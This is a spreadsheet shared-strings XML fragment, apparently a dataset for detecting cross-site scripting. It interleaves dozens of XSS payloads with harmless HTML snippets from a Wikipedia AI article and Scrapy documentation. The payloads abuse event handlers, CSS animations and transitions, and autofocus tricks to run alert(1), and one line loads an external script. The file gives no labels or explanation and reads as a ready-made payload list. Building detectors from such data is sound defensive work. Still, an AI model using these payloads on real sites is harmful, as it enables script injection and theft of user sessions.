    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;content id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;&lt;span class="mw-headline" id="Challenges"&gt;Challenges </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-disclaimer"&gt;&lt;a href="/wiki/Wikipedia:General_disclaimer" title="Wikipedia:General disclaimer"&gt;Disclaimers &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onmousedown="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onkeyup="alert(1)" contenteditable&gt;test&lt;/textarea&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-137"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-137"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;select onkeyup="alert(1)" contenteditable&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;area onmouseleave="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onmouseup="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/spiders.html"&gt;&lt;span class="doc"&gt;Spiders</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;img alt="Outline" src="//upload.wikimedia.org/wikipedia/commons/thumb/4/41/Global_thinking.svg/10px-Global_thinking.svg.png" decoding="async" title="Outline" width="10" height="16" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/4/41/Global_thinking.svg/15px-Global_thinking.svg.png 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/4/41/Global_thinking.svg/21px-Global_thinking.svg.png 2x" data-file-width="130" data-file-height="200" /&gt; &lt;b&gt;&lt;a href="/wiki/Outline_of_robotics" title="Outline of robotics"&gt;Outline &lt;/a&gt; &lt;/b&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;html class="client-nojs" lang="en" dir="ltr"&gt;</t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/downloader-middleware.html"&gt;&lt;span class="doc"&gt;Downloader Middleware</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;col onload=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Healthcare </t>
  </si>
  <si>
    <t>&lt;rtc onpointermove=alert(1)&gt;XSS&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;data ondragover=alert(1) contenteditable&gt;drop here&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;dialog onkeypress="alert(1)" contenteditable&gt;test&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;code ondblclick="alert(1)"&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onblur=alert(1) tabindex=1 id=x&gt;&lt;/tfoot&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;pre style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;a onpointerdown=alert(1)&gt;XSS&lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robot_ethics" title="Robot ethics"&gt;Ethics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup draggable="true" ondragstart="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, chpt. 2,3,7,9, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;map onmouseup="alert(1)"&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Jakob_von_Uexk%C3%BCll" class="mw-redirect" title="Jakob von Uexküll"&gt;Jakob von Uexküll &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-44"&gt;&lt;a href="#Hospitality"&gt;&lt;span class="tocnumber"&gt;7.9 </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Millipede_memory" title="Millipede memory"&gt;Millipede &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;shadow onmouseup="alert(1)"&gt;test&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;blink style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/blink&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMoravec1988" class="citation book"&gt;&lt;a href="/wiki/Hans_Moravec" title="Hans Moravec"&gt;Moravec, Hans &lt;/a&gt; (1988). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/mindchildrenfutu00mora"&gt;&lt;i&gt;Mind Children &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;b ondrop=alert(1) contenteditable&gt;drop here&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Falsifiability" title="Falsifiability"&gt;Falsifiability &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;command onbeforepaste="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Classifier_performance-230"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Classifier_performance_230-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/request-response.html"&gt;&lt;span class="doc"&gt;Requests and Responses</t>
  </si>
  <si>
    <t>&lt;ul onkeypress="alert(1)" contenteditable&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;section onbeforepaste="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Approaches </t>
  </si>
  <si>
    <t>&lt;em onkeydown="alert(1)" contenteditable&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFSearle1999"&gt;Searle 1999 &lt;/a&gt;. &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>document.getElementsByClassName("example")</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;svg onblur=alert(1) tabindex=1 id=x&gt;&lt;/svg&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">  &lt;hr/&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointerout=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Recurrent_neural_networks" class="mw-redirect" title="Recurrent neural networks"&gt;Recurrent neural networks &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;th onmouseleave="alert(1)"&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFHawkinsBlakeslee2005"&gt;Hawkins &amp;amp; Blakeslee 2005 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;option onclick="alert(1)"&gt;test&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;code onpointerdown=alert(1)&gt;XSS&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;font style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;link oncut="alert(1)" contenteditable&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;dt id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/dt&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;svg style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;command onblur=alert(1) tabindex=1 id=x&gt;&lt;/command&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rtc draggable="true" ondrag="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;label onpointerdown=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Learn how to use Python’s builtin logging on Scrapy.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;animatemotion onpointerover=alert(1)&gt;XSS&lt;/animatemotion&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;~422–442, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/SONOS" title="SONOS"&gt;SONOS &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;International Journal of Information Technology and Knowledge Management &lt;/i&gt;. &lt;b&gt;4 &lt;/b&gt; (1): 173–176. Archived from &lt;a rel="nofollow" class="external text" href="http://www.csjournals.com/IJITKM/PDF%204-1/35.Sandeep%20Rajani.pdf"&gt;the original &lt;/a&gt; &lt;span class="cs1-format"&gt;(PDF) </t>
  </si>
  <si>
    <t>&lt;acronym ondblclick="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHutter2012" class="citation book"&gt;Hutter, M. (2012). "One Decade of Universal Artificial Intelligence". &lt;i&gt;Theoretical Foundations of Artificial General Intelligence &lt;/i&gt;. Atlantis Thinking Machines. &lt;b&gt;4 &lt;/b&gt;. pp.&amp;#160;67–88. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.228.8725"&gt;10.1.1.228.8725 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;rp onblur=alert(1) tabindex=1 id=x&gt;&lt;/rp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Automata_theory" title="Automata theory"&gt;Automata theory &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/fieldset&gt;</t>
  </si>
  <si>
    <t>&lt;frameset onclick="alert(1)"&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=Sinteza&amp;amp;rft.atitle=Current+applications+of+Artificial+Intelligence+in+tourism+and+hospitality&amp;amp;rft.date=2019&amp;amp;rft_id=https%3A%2F%2Fwww.researchgate.net%2Fpublication%2F333242550&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/loaders.html"&gt;Item Loaders&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onfocus=alert(1)&gt;&lt;/xss&gt;</t>
  </si>
  <si>
    <t>&lt;style onbeforecopy="alert(1)" contenteditable&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;image3 onpointerleave=alert(1)&gt;XSS&lt;/image3&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;(1879) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ins draggable="true" ondrag="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;rtc draggable="true" ondragend="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;dfn draggable="true" ondragend="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;356–373 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;select onclick="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;u id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;element draggable="true" ondragstart="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="mw-hidden-catlinks" class="mw-hidden-catlinks mw-hidden-cats-hidden"&gt;Hidden categories: &lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_needing_page_number_citations_from_December_2016" title="Category:Wikipedia articles needing page number citations from December 2016"&gt;Wikipedia articles needing page number citations from December 2016 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:CS1_Chinese-language_sources_(zh)" title="Category:CS1 Chinese-language sources (zh)"&gt;CS1 Chinese-language sources (zh) &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_needing_page_number_citations_from_February_2011" title="Category:Wikipedia articles needing page number citations from February 2011"&gt;Wikipedia articles needing page number citations from February 2011 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Webarchive_template_wayback_links" title="Category:Webarchive template wayback links"&gt;Webarchive template wayback links &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:All_articles_with_dead_external_links" title="Category:All articles with dead external links"&gt;All articles with dead external links &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_dead_external_links_from_October_2019" title="Category:Articles with dead external links from October 2019"&gt;Articles with dead external links from October 2019 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_permanently_dead_external_links" title="Category:Articles with permanently dead external links"&gt;Articles with permanently dead external links &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Pages_with_citations_lacking_titles" title="Category:Pages with citations lacking titles"&gt;Pages with citations lacking titles &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Pages_with_citations_having_bare_URLs" title="Category:Pages with citations having bare URLs"&gt;Pages with citations having bare URLs &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Pages_with_URL_errors" title="Category:Pages with URL errors"&gt;Pages with URL errors &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_pending_changes_protected_pages" title="Category:Wikipedia pending changes protected pages"&gt;Wikipedia pending changes protected pages &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_short_description" title="Category:Articles with short description"&gt;Articles with short description &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Use_dmy_dates_from_January_2018" title="Category:Use dmy dates from January 2018"&gt;Use dmy dates from January 2018 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:All_articles_with_unsourced_statements" title="Category:All articles with unsourced statements"&gt;All articles with unsourced statements &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_unsourced_statements_from_June_2019" title="Category:Articles with unsourced statements from June 2019"&gt;Articles with unsourced statements from June 2019 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_unsourced_statements_from_July_2019" title="Category:Articles with unsourced statements from July 2019"&gt;Articles with unsourced statements from July 2019 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:All_accuracy_disputes" title="Category:All accuracy disputes"&gt;All accuracy disputes &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_disputed_statements_from_July_2019" title="Category:Articles with disputed statements from July 2019"&gt;Articles with disputed statements from July 2019 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_needing_clarification_from_July_2019" title="Category:Wikipedia articles needing clarification from July 2019"&gt;Wikipedia articles needing clarification from July 2019 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_containing_potentially_dated_statements_from_2016" title="Category:Articles containing potentially dated statements from 2016"&gt;Articles containing potentially dated statements from 2016 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:All_articles_containing_potentially_dated_statements" title="Category:All articles containing potentially dated statements"&gt;All articles containing potentially dated statements &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_needing_additional_references_from_January_2020" title="Category:Articles needing additional references from January 2020"&gt;Articles needing additional references from January 2020 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:All_articles_needing_additional_references" title="Category:All articles needing additional references"&gt;All articles needing additional references &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_unsourced_statements_from_December_2019" title="Category:Articles with unsourced statements from December 2019"&gt;Articles with unsourced statements from December 2019 &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:CS1:_Julian%E2%80%93Gregorian_uncertainty" title="Category:CS1: Julian–Gregorian uncertainty"&gt;CS1: Julian–Gregorian uncertainty &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:CS1:_long_volume_value" title="Category:CS1: long volume value"&gt;CS1: long volume value &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Articles_with_Internet_Encyclopedia_of_Philosophy_links" title="Category:Articles with Internet Encyclopedia of Philosophy links"&gt;Articles with Internet Encyclopedia of Philosophy links &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_with_BNF_identifiers" title="Category:Wikipedia articles with BNF identifiers"&gt;Wikipedia articles with BNF identifiers &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_with_GND_identifiers" title="Category:Wikipedia articles with GND identifiers"&gt;Wikipedia articles with GND identifiers &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_with_LCCN_identifiers" title="Category:Wikipedia articles with LCCN identifiers"&gt;Wikipedia articles with LCCN identifiers &lt;/a&gt; &lt;/li&gt;&lt;li&gt;&lt;a href="/wiki/Category:Wikipedia_articles_with_NDL_identifiers" title="Category:Wikipedia articles with NDL identifiers"&gt;Wikipedia articles with NDL identifiers &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;sub onkeyup="alert(1)" contenteditable&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;menuitem id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/menuitem&gt;</t>
  </si>
  <si>
    <t>Glossary &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="plainlist" style="padding:0 0.1em 0.4em"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;multicol style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;source onpointerdown=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/bdi&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onmousemove="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onpointerout=alert(1)&gt;XSS&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Domestic_robot" title="Domestic robot"&gt;Domestic &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;content onblur=alert(1) tabindex=1 id=x&gt;&lt;/content&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul onmouseenter="alert(1)"&gt;test&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption draggable="true" ondragenter="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;em id=x tabindex=1 onactivate=alert(1)&gt;&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;bdi onmousemove="alert(1)"&gt;test&lt;/bdi&gt;</t>
  </si>
  <si>
    <t>&lt;ol id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKaplanHaenlein2019" class="citation journal"&gt;Kaplan, Andreas; Haenlein, Michael (2019). "Siri, Siri in my Hand, who's the Fairest in the Land? On the Interpretations, Illustrations and Implications of Artificial Intelligence". &lt;i&gt;Business Horizons &lt;/i&gt;. &lt;b&gt;62 &lt;/b&gt;: 15–25. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.bushor.2018.08.004"&gt;10.1016/j.bushor.2018.08.004 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Business+Horizons&amp;amp;rft.atitle=Siri%2C+Siri+in+my+Hand%2C+who%27s+the+Fairest+in+the+Land%3F+On+the+Interpretations%2C+Illustrations+and+Implications+of+Artificial+Intelligence&amp;amp;rft.volume=62&amp;amp;rft.pages=15-25&amp;amp;rft.date=2019&amp;amp;rft_id=info%3Adoi%2F10.1016%2Fj.bushor.2018.08.004&amp;amp;rft.aulast=Kaplan&amp;amp;rft.aufirst=Andreas&amp;amp;rft.au=Haenlein%2C+Michael&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;element onpointermove=alert(1)&gt;XSS&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;discard onpointerdown=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
    <t>&lt;address draggable="true" ondragstart="alert(1)"&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;th onkeyup="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;q onkeyup="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>(alert)(1)</t>
  </si>
  <si>
    <t>&lt;tr onmouseenter="alert(1)"&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;b id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/b&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-379"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-379"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;track onpointerup=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;form onkeyup="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;dd id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;article onmouseup="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;dd onload=alert(1)&gt;&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;header onmouseenter="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmouseover="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;strike id=x tabindex=1 onfocus=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Network_protocol" class="mw-redirect" title="Network protocol"&gt;Network protocol &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/An_Essay_towards_a_Real_Character,_and_a_Philosophical_Language" class="mw-redirect" title="An Essay towards a Real Character, and a Philosophical Language"&gt;An Essay towards a Real Character, and a Philosophical Language &lt;/a&gt; &lt;/i&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;s onpaste="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Evans_2015-407"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Evans_2015_407-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Gaussian_mixture_model" class="mw-redirect" title="Gaussian mixture model"&gt;Gaussian mixture model &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;audio onpointerleave=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Faith_and_rationality" title="Faith and rationality"&gt;Faith and rationality &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;br id=x tabindex=1 onactivate=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;th oncopy="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;col onblur=alert(1) tabindex=1 id=x&gt;&lt;/col&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;area onmouseover="alert(1)"&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, ~chpt. 6 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT SRC=//.rocks/.j&gt;</t>
  </si>
  <si>
    <t>&lt;cite onclick="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;abbr draggable="true" ondragleave="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Sociocybernetics" title="Sociocybernetics"&gt;Sociocybernetics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;noscript style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/noscript&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;td class="navbox-abovebelow" colspan="2"&gt;</t>
  </si>
  <si>
    <t>&lt;span onmouseover="alert(1)"&gt;test&lt;/span&gt;</t>
  </si>
  <si>
    <t>&lt;figcaption onmouseup="alert(1)"&gt;test&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onmouseenter="alert(1)"&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;applet onbeforecut="alert(1)" contenteditable&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;blink onpointerout=alert(1)&gt;XSS&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Isaac_Newton" title="Isaac Newton"&gt;Isaac Newton &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
